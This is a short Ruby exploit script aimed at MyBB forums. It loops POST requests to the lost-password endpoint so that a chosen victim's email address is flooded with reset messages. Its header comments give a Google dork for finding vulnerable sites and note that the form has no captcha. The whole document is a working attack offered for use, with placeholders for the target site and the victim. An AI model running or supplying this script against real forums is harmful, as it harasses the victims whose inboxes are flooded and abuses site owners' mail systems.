|
====================== MyBB 2002-2010 exploit ======================
#!/usr/local/bin/ruby #MyBB Owned #30/03/10 #Ruby Code By, Whivack Gsk #Win32 and Ruby Interpreter 1.8.6 #Dork Google : "Moteur MyBB, 2002-2010 MyBB Group." #Sensitive URL : /member.php?action=lostpw #No Security : No Captcha #POST_Form Method : "email" and "action" #It to serve freight forwarding of the customer in their insus
require 'net/http' require 'uri'
comp = 0 while comp < 10 attack = Net::HTTP.post_form( URI.parse("http://siteweak.com/forum/member.php?action=lostpw"), # Replace siteweak.com {'email'=>'adress@host.com', 'action'=>'do_lostpw'}) # Replace adress@host.com by victim address comp += 1 end
|
|
|